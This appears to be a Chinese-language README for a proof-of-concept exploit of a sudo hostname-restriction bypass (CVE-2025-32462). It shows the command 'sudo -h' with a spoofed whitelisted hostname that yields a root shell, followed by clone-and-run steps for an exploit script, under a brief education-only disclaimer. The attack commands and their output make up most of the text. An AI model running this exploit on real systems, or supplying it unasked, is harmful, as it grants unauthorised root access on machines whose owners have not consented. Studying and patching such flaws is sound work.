主机名欺骗权限提升 (CVE-2025-32462)
“你吃下蓝色药丸……故事结束。你吃下红色药丸……你将获得 root。”
该漏洞利用程序演示了 sudo 中的一个权限提升漏洞 (CVE-2025-32462),其中基于主机名的限制可以通过 -h 参数绕过。PoC 创建一个受限用户环境,然后通过欺骗白名单中的主机名来逃逸,从而获得 root 访问权限。
[user@matrix-node]$ sudo -h zion-core bash # 欺骗白名单主机名
[root@matrix-node]# id # 在错误的主机名上获得了 root!
uid=0(root) gid=0(root) groups=0(root)
克隆仓库:
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape
赋予可执行权限并运行:
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh
按照交互提示演示:
仅用于教育/研究目的。仅在你拥有或有权测试的系统上使用。